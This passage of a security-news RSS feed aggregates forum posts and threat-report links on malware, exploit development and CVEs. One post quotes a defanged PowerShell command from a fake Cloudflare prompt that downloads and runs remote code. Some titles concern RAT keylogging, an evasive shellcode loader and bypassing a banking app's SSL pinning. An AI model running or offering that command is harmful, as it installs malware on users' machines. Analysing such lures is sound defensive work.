<br />
#kaspersky #esg #sustainability #cybersecurity<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kaspersky’s Sustainability report 2024-2025: our sustainability principles]]></title>
<description><![CDATA[Author: Kaspersky - Bewertung: 0x - Views:1 In this video, we explain what sustainability means for Kaspersky. Learn how respect for human rights, adherence to regulatory requirements and meaningful contribution to society and environment shape our guiding principles. From our commitment to trans...]]></description>
<link>https://tsecurity.de/de/3688687/it+sicherheit/malware+trojaner+viren/kasperskys+sustainability+report+2024-2025+our+sustainability+principles/</link>
<pubDate>Thu, 23 Jul 2026 12:20:12 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Kaspersky - Bewertung: 0x - Views:1 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/X3sBp_91LnE?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In this video, we explain what sustainability means for Kaspersky. Learn how respect for human rights, adherence to regulatory requirements and meaningful contribution to society and environment shape our guiding principles. From our commitment to transparency, resilient supply chains to measures that ensure our products can be trusted, we're actively working towards a safer future.<br />
<br />
Find more details in the report: https://kas.pr/7jar<br />
<br />
#kaspersky #esg #sustainability #cybersecurity<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anime Streaming Sites – Juli 2026]]></title>
<description><![CDATA[Welche Anime Streaming Sites sind weiterhin aktiv? Viele sind offline. Hier nur Streaming, kein Download! Wir haben alle Einträge geprüft.
Der Artikel Anime Streaming Sites – Juli 2026 erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3688554/it+sicherheit/malware+trojaner+viren/anime+streaming+sites+-+juli+2026/</link>
<pubDate>Thu, 23 Jul 2026 11:43:45 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Welche Anime Streaming Sites sind weiterhin aktiv? Viele sind offline. Hier nur Streaming, kein Download! Wir haben alle Einträge geprüft.</p>
<p>Der Artikel <a href="https://tarnkappe.info/listen/anime-streaming-sites-juli-2026-331706.html">Anime Streaming Sites – Juli 2026</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Cloudflare message on Wordpress]]></title>
<description><![CDATA[What would the below comment have ran?  cmdline: "C:\Windows\system32\WindowsPowerShel\v1[.J0\PowerShell[.Jexe" -c iexirm delistemanallyl.Jrainbow-mel.Jonline? read=8b2d80c7569e4151 -UseBasicParsing)    submitted by    /u/SeigneurHarry   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3687497/it+sicherheit/malware+trojaner+viren/fake+cloudflare+message+on+wordpress/</link>
<pubDate>Wed, 22 Jul 2026 22:06:36 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>What would the below comment have ran? </p> <p>cmdline: "C:\Windows\system32\WindowsPowerShel\v1[.J0\PowerShell[.Jexe" -c iexirm delistemanallyl.Jrainbow-mel.Jonline?<br> read=8b2d80c7569e4151 -UseBasicParsing)</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/SeigneurHarry"> /u/SeigneurHarry </a> <br> <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v3gwuo/fake_cloudflare_message_on_wordpress/">[link]</a></span>   <span><a href="https://www.reddit.com/r/MalwareAnalysis/comments/1v3gwuo/fake_cloudflare_message_on_wordpress/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[INC Ransom: Infrastructure Analysis, Operational Tradecraft, and Detection Opportunities]]></title>
<description><![CDATA[2026-07-20 • Medium Ireneusz Tarnowski
     • Ireneusz Tarnowski
     • elf.inc
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3686304/it+sicherheit/malware+trojaner+viren/inc+ransom+infrastructure+analysis+operational+tradecraft+and+detection+opportunities/</link>
<pubDate>Wed, 22 Jul 2026 14:37:04 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-20 • Medium Ireneusz Tarnowski
     • Ireneusz Tarnowski
     • elf.inc
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/bc9bc0aa-7360-42cb-b8a7-a243e778fc3f/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[[QuickNote] Mustang Panda ToneShell (APT S1239) Beacon Shellcode – RE Analysis]]></title>
<description><![CDATA[2026-07-21 • kienmanowar Blog
     • m4n0w4r, Tran Trung Kien
     • win.toneshell
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3686244/it+sicherheit/malware+trojaner+viren/quicknote+mustang+panda+toneshell+apt+s1239+beacon+shellcode+-+re+analysis/</link>
<pubDate>Wed, 22 Jul 2026 14:19:05 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-21 • kienmanowar Blog
     • m4n0w4r, Tran Trung Kien
     • win.toneshell
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/e12175f3-cfa7-41d5-a65e-12f2a4356d80/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Beyond the Archive: CVE-2025-8088 Stealer Targeting Ukraine]]></title>
<description><![CDATA[2026-07-22 • bluecyber
     • Nguyen Dang Hung
     • win.giftedcrook
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3686243/it+sicherheit/malware+trojaner+viren/beyond+the+archive+cve-2025-8088+stealer+targeting+ukraine/</link>
<pubDate>Wed, 22 Jul 2026 14:19:03 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-22 • bluecyber
     • Nguyen Dang Hung
     • win.giftedcrook
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/7e97fc11-987a-4439-aaba-de84e1f0417e/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Hopeless]]></title>
<description><![CDATA[2026-07-18 • Github (muhammadzidane632)
     • Zdn2Pwn
     • win.hopeless
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3686188/it+sicherheit/malware+trojaner+viren/hopeless/</link>
<pubDate>Wed, 22 Jul 2026 13:52:36 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-18 • Github (muhammadzidane632)
     • Zdn2Pwn
     • win.hopeless
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/dfcbce9b-8564-4e72-bc65-5c30a57820b2/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[From Payroll to Pyongyang: The DPRK IT Worker Money Trail]]></title>
<description><![CDATA[2026-07-21 • DTEX
     • Michael Barnhart
    
    
    
    Open article on Malpedia]]></description>
<link>https://tsecurity.de/de/3686187/it+sicherheit/malware+trojaner+viren/from+payroll+to+pyongyang+the+dprk+it+worker+money+trail/</link>
<pubDate>Wed, 22 Jul 2026 13:52:35 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!--  -->
<div>
    2026-07-21 • DTEX
     • Michael Barnhart
    
    
    <br>
    <a href="https://malpedia.caad.fkie.fraunhofer.de/library/c330a61c-6904-4d8f-b550-c88c93c90fe3/">Open article on Malpedia</a>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[7,7 Mio. Deutsche nutzen illegales IPTV, immer mehr werden erwischt: Welche Konsequenzen drohen?]]></title>
<description><![CDATA[Laut einer aktuellen Studie nutzten 2025 rund 7,7 Millionen Deutsche illegale Streams. Das sind fast zwei Millionen mehr als im Jahr 2022.
Der Artikel 7,7 Mio. Deutsche nutzen illegales IPTV, immer mehr werden erwischt: Welche Konsequenzen drohen? erschien zuerst auf TARNKAPPE.INFO]]></description>
<link>https://tsecurity.de/de/3685557/it+sicherheit/malware+trojaner+viren/77+mio+deutsche+nutzen+illegales+iptv+immer+mehr+werden+erwischt+welche+konsequenzen+drohen/</link>
<pubDate>Wed, 22 Jul 2026 09:51:45 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Laut einer aktuellen Studie nutzten 2025 rund 7,7 Millionen Deutsche illegale Streams. Das sind fast zwei Millionen mehr als im Jahr 2022.</p>
<p>Der Artikel <a href="https://tarnkappe.info/artikel/iptv/77-mio-deutsche-nutzen-illegales-iptv-immer-mehr-werden-erwischt-welche-konsequenzen-drohen-331668.html">7,7 Mio. Deutsche nutzen illegales IPTV, immer mehr werden erwischt: Welche Konsequenzen drohen?</a> erschien zuerst auf <a href="https://tarnkappe.info/">TARNKAPPE.INFO</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Made a Tool for saving some time while forging exploit in pwn CTF's]]></title>
<description><![CDATA[Check out @ https://github.com/DarkAngel-0x0/pwntemplate Feedbacks welcomed    submitted by    /u/Free-Criticism289   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685151/it+sicherheit/malware+trojaner+viren/i+made+a+tool+for+saving+some+time+while+forging+exploit+in+pwn+ctfs/</link>
<pubDate>Wed, 22 Jul 2026 04:37:34 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Check out @ <a href="https://github.com/DarkAngel-0x0/pwntemplate">https://github.com/DarkAngel-0x0/pwntemplate</a><br> Feedbacks welcomed</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Free-Criticism289"> /u/Free-Criticism289 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uvd7xd/i_made_a_tool_for_saving_some_time_while_forging/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uvd7xd/i_made_a_tool_for_saving_some_time_while_forging/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Vulnerability in Realtek driver allows DMA controller abuse from user mode with no additional hardware or driver]]></title>
<description><![CDATA[The vulnerability allows non-privileged users to program the DMA controller, enabling arbitrary physical memory reads and writes.    submitted by    /u/zwclose   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685150/it+sicherheit/malware+trojaner+viren/vulnerability+in+realtek+driver+allows+dma+controller+abuse+from+user+mode+with+no+additional+hardware+or+driver/</link>
<pubDate>Wed, 22 Jul 2026 04:37:32 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>The vulnerability allows non-privileged users to program the DMA controller, enabling arbitrary physical memory reads and writes.</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/zwclose"> /u/zwclose </a> <br> <span><a href="https://zwclose.github.io/2026/07/08/rtsper2.html">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uvs650/vulnerability_in_realtek_driver_allows_dma/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2019-9053 exploit rewritten in Python 3 as a personal practice project]]></title>
<description><![CDATA[Hello everyone! I want to share a small Python script I wrote. It is inspired by the exploit 46635 on Exploit-DB for CVE-2019-9053 (a time-based SQL Injection in CMS Made Simple). I decided to write my own version when I was doing the SimpleCTF room on TryHackMe. I wanted to update the code to Py...]]></description>
<link>https://tsecurity.de/de/3685149/it+sicherheit/malware+trojaner+viren/cve-2019-9053+exploit+rewritten+in+python+3+as+a+personal+practice+project/</link>
<pubDate>Wed, 22 Jul 2026 04:37:30 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hello everyone!</p> <p>I want to share a small Python script I wrote. It is inspired by the exploit 46635 on Exploit-DB for CVE-2019-9053 (a time-based SQL Injection in CMS Made Simple).</p> <p>I decided to write my own version when I was doing the SimpleCTF room on TryHackMe. I wanted to update the code to Python 3. I also wanted to make this new version more interactive and easy to use. So, I added a clean command line interface and some extra features (like different extraction modes, delay controls, and email alerts using environment variables).</p> <p>Please try it and tell me what you think! I would love to hear your feedback and ideas to make it better.</p> <p><a href="https://github.com/rgkue/mysqli">https://github.com/rgkue/mysqli</a></p> <p>Happy hacking! :D</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/rgkue"> /u/rgkue </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uw0n3t/cve20199053_exploit_rewritten_in_python_3_as_a/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uw0n3t/cve20199053_exploit_rewritten_in_python_3_as_a/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Nightmare Eclipse could be dropping his big promised exploit today]]></title>
<description><![CDATA[submitted by    /u/ILikeNoodlesXOXO   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685148/it+sicherheit/malware+trojaner+viren/nightmare+eclipse+could+be+dropping+his+big+promised+exploit+today/</link>
<pubDate>Wed, 22 Jul 2026 04:37:27 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/ILikeNoodlesXOXO"> /u/ILikeNoodlesXOXO </a> <br> <span><a href="https://www.reddit.com/r/cybersecurity/comments/1uw2f7e/nightmare_eclipse_could_be_dropping_his_big/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uw2yms/nightmare_eclipse_could_be_dropping_his_big/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Writing an Evasive .NET Shellcode Loader]]></title>
<description><![CDATA[submitted by    /u/slashcrypto   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685147/it+sicherheit/malware+trojaner+viren/writing+an+evasive+net+shellcode+loader/</link>
<pubDate>Wed, 22 Jul 2026 04:37:26 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1uwbf3c/writing_an_evasive_net_shellcode_loader/"> <img src="https://external-preview.redd.it/nhVPtOttVhUwMqrd2rfzStWXQ2l5NvYJxkYmBppmbU0.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=c1089f6c79053ba9a5b86dbe62170fa8d3eb8a37" alt="Writing an Evasive .NET Shellcode Loader" title="Writing an Evasive .NET Shellcode Loader"> </a> </td><td>   submitted by   <a href="https://www.reddit.com/user/slashcrypto"> /u/slashcrypto </a> <br> <span><a href="https://slashsec.at/en/blog/writing-an-evasive-dotnet-shellcode-loader">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uwbf3c/writing_an_evasive_net_shellcode_loader/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[Moving from finding real bugs to make real exploits]]></title>
<description><![CDATA[Hi I started pwning from a year from pwn college, some THM, and I was quite good. In this month, I started getting into the real world. I find bugs, crashes, report, and wait for CVEs. But the problem for me is I can't exploit them. I can exploit the same bug in a CTF chall, but in the real world...]]></description>
<link>https://tsecurity.de/de/3685146/it+sicherheit/malware+trojaner+viren/moving+from+finding+real+bugs+to+make+real+exploits/</link>
<pubDate>Wed, 22 Jul 2026 04:37:24 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi</p> <p>I started pwning from a year from pwn college, some THM, and I was quite good. In this month, I started getting into the real world. I find bugs, crashes, report, and wait for CVEs. But the problem for me is I can't exploit them. I can exploit the same bug in a CTF chall, but in the real world I can't, because of the stability, how large the target is, making me have the exploit just in my mind. And this is especially in kernel. When I was trying to re-exploit an old CVE using a different way, I get hit with the internals, nf_tables, TCP, and network. Those are complex. My feer is the internals and large targets. Did anyone pass with this and find a solve?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Feisty_Revolution959"> /u/Feisty_Revolution959 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uwevlg/moving_from_finding_real_bugs_to_make_real/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uwevlg/moving_from_finding_real_bugs_to_make_real/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[How I crafted an exploit PoC for a Linskys router]]></title>
<description><![CDATA[I’ve been doing some vulnerability research on a known CVE (CVE-2025-60690) on a consumer Linksys router and wanted to share the workflow I used to investigate it. The process started by targeting the physical hardware: identifying the UART pads on the board using a digital multimeter to access t...]]></description>
<link>https://tsecurity.de/de/3685145/it+sicherheit/malware+trojaner+viren/how+i+crafted+an+exploit+poc+for+a+linskys+router/</link>
<pubDate>Wed, 22 Jul 2026 04:37:23 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I’ve been doing some vulnerability research on a known CVE (<strong>CVE-2025-60690</strong>) on a consumer Linksys router and wanted to share the workflow I used to investigate it.</p> <p>The process started by targeting the physical hardware: identifying the UART pads on the board using a digital multimeter to access the Linux-based shell console. From there, I extracted the vulnerable binary (from the CVE description), and reversed it in Ghidra. Next, I used a gdb+gdbserver setup to perform dynamic analysis to investigate the memory behaviors.</p> <p>I managed to successfully achieve RCE from the stack-based buffer overflow vulnerability to land a root shell. The exploit PoC for <strong>CVE-2025-60690</strong> just got cited on the official <a href="https://nvd.nist.gov/vuln/detail/CVE-2025-60690">CVE page</a> and <a href="https://www.exploit-db.com/exploits/52548">exploit-db.com</a>.</p> <p>I just started a YouTube channel dedicated to breaking down IoT hacking concepts. Also, I’ve compiled my step-by-step research notes in a reference doc. If you're working on similar hardware research and want a copy of the notes, drop a comment or shoot me a DM and I'll gladly send them over!</p> <p><a href="https://preview.redd.it/vmci7ftei4dh1.png?width=1240&amp;format=png&amp;auto=webp&amp;s=f1a206fe69710f1aba4479621dd54464cde9fc27">USB-UART connection to Raspberry Pi</a></p> <p><a href="https://preview.redd.it/1sw4y9sdh4dh1.png?width=1892&amp;format=png&amp;auto=webp&amp;s=157fce524160b8a87ecff46de3e7a29dee0f5374">Testing UART pads with digital multimeter</a></p> <p><a href="https://preview.redd.it/gx6x22p0i4dh1.png?width=1497&amp;format=png&amp;auto=webp&amp;s=9192243cd76560b64f263cb5d62c57c30294754f">Testing buffer overflow behavior (gdb+gdbserver setup)</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Dapper-Depth2940"> /u/Dapper-Depth2940 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uwq84s/how_i_crafted_an_exploit_poc_for_a_linskys_router/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uwq84s/how_i_crafted_an_exploit_poc_for_a_linskys_router/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[How do I make my RAT monitor keystrokes or move mouse etc.]]></title>
<description><![CDATA[submitted by    /u/Green-Week-9741   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685144/it+sicherheit/malware+trojaner+viren/how+do+i+make+my+rat+monitor+keystrokes+or+move+mouse+etc/</link>
<pubDate>Wed, 22 Jul 2026 04:37:21 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1uwwmbb/how_do_i_make_my_rat_monitor_keystrokes_or_move/"> <img src="https://external-preview.redd.it/OkBwv6NdCFBydM6sPLhGTfH7iZ5UDBbF2Q0QACjC9OE.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=3807179965a0a9dfdfa48757256b83798b5c98a2" alt="How do I make my RAT monitor keystrokes or move mouse etc." title="How do I make my RAT monitor keystrokes or move mouse etc."> </a> </td><td>   submitted by   <a href="https://www.reddit.com/user/Green-Week-9741"> /u/Green-Week-9741 </a> <br> <span><a href="https://www.reddit.com/r/Hacking_Tutorials/comments/1uwvpo2/how_do_i_make_my_rat_monitor_keystrokes_or_move/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uwwmbb/how_do_i_make_my_rat_monitor_keystrokes_or_move/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[Exploiting Random Number Generation]]></title>
<description><![CDATA[If you're looking for an exploit development tutorial for absolute beginners this week we're looking at what I would consider just that! This week we look at the "random" binary exploitation challenge hosted on pwnable[.]kr.  This is a great beginner tutorial since we exploit a flaw that is "easy...]]></description>
<link>https://tsecurity.de/de/3685143/it+sicherheit/malware+trojaner+viren/exploiting+random+number+generation/</link>
<pubDate>Wed, 22 Jul 2026 04:37:20 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>If you're looking for an exploit development tutorial for absolute beginners this week we're looking at what I would consider just that! This week we look at the "random" binary exploitation challenge hosted on pwnable[.]kr. </p> <p>This is a great beginner tutorial since we exploit a flaw that is "easy" and unfortunately, still very real within some enterprise environments. It also helps you understand that no number is truly random. </p> <p>The crazy part? We don't even drop into a debugger in this tutorial. </p> <p>Be the end of this tutorial you should have: </p> <p>- Learned about random number generation in C<br> - Learned about XOR operations<br> - Finding header files that contain dependencies using man pages<br> - Dissecting C source code </p> <p>You can find the video here:</p> <p><a href="https://youtu.be/jDlMFC4etrs?si=akuTx1KTkCxE5Ndo">https://youtu.be/jDlMFC4etrs?si=akuTx1KTkCxE5Ndo</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/AdvisorPowerful9769"> /u/AdvisorPowerful9769 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1ux66d6/exploiting_random_number_generation/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1ux66d6/exploiting_random_number_generation/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Looking for Mentor]]></title>
<description><![CDATA[Hello everyone,  I wanted to post in here to see if anyone would consider being a mentor. I want to break into malware dev and vulnerability research however since this is such a niche job community, it’s hard to find someone who has professional experience in the field. I would love to talk with...]]></description>
<link>https://tsecurity.de/de/3685142/it+sicherheit/malware+trojaner+viren/looking+for+mentor/</link>
<pubDate>Wed, 22 Jul 2026 04:37:19 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hello everyone, </p> <p>I wanted to post in here to see if anyone would consider being a mentor. I want to break into malware dev and vulnerability research however since this is such a niche job community, it’s hard to find someone who has professional experience in the field. I would love to talk with anyone who has prior experience in the field and wouldn’t mind giving me some guidance. Thank you guys! </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/custampin101"> /u/custampin101 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uxl99r/looking_for_mentor/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uxl99r/looking_for_mentor/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[USB Debugging and SSL Pinning Bypass at once?]]></title>
<description><![CDATA[Hi I'm trying to pentest a banking app and the most difficult Bypass so far is USB Debugging. Without bypassing that I don't know how to Bypass SSL pinning with Frida. Is there any way to do this? Thank you!    submitted by    /u/Warm-Tadpole-8134   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685141/it+sicherheit/malware+trojaner+viren/usb+debugging+and+ssl+pinning+bypass+at+once/</link>
<pubDate>Wed, 22 Jul 2026 04:37:18 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi I'm trying to pentest a banking app and the most difficult Bypass so far is USB Debugging. Without bypassing that I don't know how to Bypass SSL pinning with Frida. Is there any way to do this?</p> <p>Thank you!</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Warm-Tadpole-8134"> /u/Warm-Tadpole-8134 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uxo4c7/usb_debugging_and_ssl_pinning_bypass_at_once/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uxo4c7/usb_debugging_and_ssl_pinning_bypass_at_once/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Pwn college]]></title>
<description><![CDATA[Hi guys just wondering should I have knowledge python and C before I start the pwn paths for cybersecurity?    submitted by    /u/RewardOk8371   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685140/it+sicherheit/malware+trojaner+viren/pwn+college/</link>
<pubDate>Wed, 22 Jul 2026 04:37:16 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hi guys just wondering should I have knowledge python and C before I start the pwn paths for cybersecurity?</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/RewardOk8371"> /u/RewardOk8371 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uxuc4s/pwn_college/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uxuc4s/pwn_college/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Interactive documentation and visual reference for binary formats and system memory layouts.]]></title>
<description><![CDATA[submitted by    /u/RubberDuck31337   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685139/it+sicherheit/malware+trojaner+viren/interactive+documentation+and+visual+reference+for+binary+formats+and+system+memory+layouts/</link>
<pubDate>Wed, 22 Jul 2026 04:37:15 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<table> <tr><td> <a href="https://www.reddit.com/r/ExploitDev/comments/1uyit10/interactive_documentation_and_visual_reference/"> <img src="https://external-preview.redd.it/aSxC3yqPImZPTtBt1sMKv92mDwr17fKwgABDuiaZpEQ.png?width=640&amp;crop=smart&amp;auto=webp&amp;s=914c6fd6115718b97e7fd84952cfdbe5afa7c218" alt="Interactive documentation and visual reference for binary formats and system memory layouts." title="Interactive documentation and visual reference for binary formats and system memory layouts."> </a> </td><td>   submitted by   <a href="https://www.reddit.com/user/RubberDuck31337"> /u/RubberDuck31337 </a> <br> <span><a href="https://github.com/Proteqtum/interactive-binary-structures/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uyit10/interactive_documentation_and_visual_reference/">[comments]</a></span> </td></tr></table>]]></content:encoded>
</item>
<item>
<title><![CDATA[can anyone help me solve exploit development challenge.]]></title>
<description><![CDATA[I have got 2 files and I need to find a vulnerability and exploit it. So I need some help regarding it.     submitted by    /u/Recent_East_8938   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685138/it+sicherheit/malware+trojaner+viren/can+anyone+help+me+solve+exploit+development+challenge/</link>
<pubDate>Wed, 22 Jul 2026 04:37:14 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I have got 2 files and I need to find a vulnerability and exploit it. So I need some help regarding it.</p> <p><a href="https://www.reddit.com/submit/?source_id=t3_1uz18kp&amp;composer_entry=crosspost_prompt"></a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/Recent_East_8938"> /u/Recent_East_8938 </a> <br> <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uz1933/can_anyone_help_me_solve_exploit_development/">[link]</a></span>   <span><a href="https://www.reddit.com/r/ExploitDev/comments/1uz1933/can_anyone_help_me_solve_exploit_development/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows AppResolver LPE: From AppContainer to SYSTEM. PoC linked to CVE-2026-50454]]></title>
<description><![CDATA[submitted by    /u/ShufflinMuffin   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3685137/it+sicherheit/malware+trojaner+viren/windows+appresolver+lpe+from+appcontainer+to+system+poc+linked+to+cve-2026-50454/</link>
<pubDate>Wed, 22 Jul 2026 04:37:12 +0200</pubDate>
<category>⚠️ Malware / Trojaner / Viren</category>
<source url="https://tsecurity.de">tsecurity.de</source>
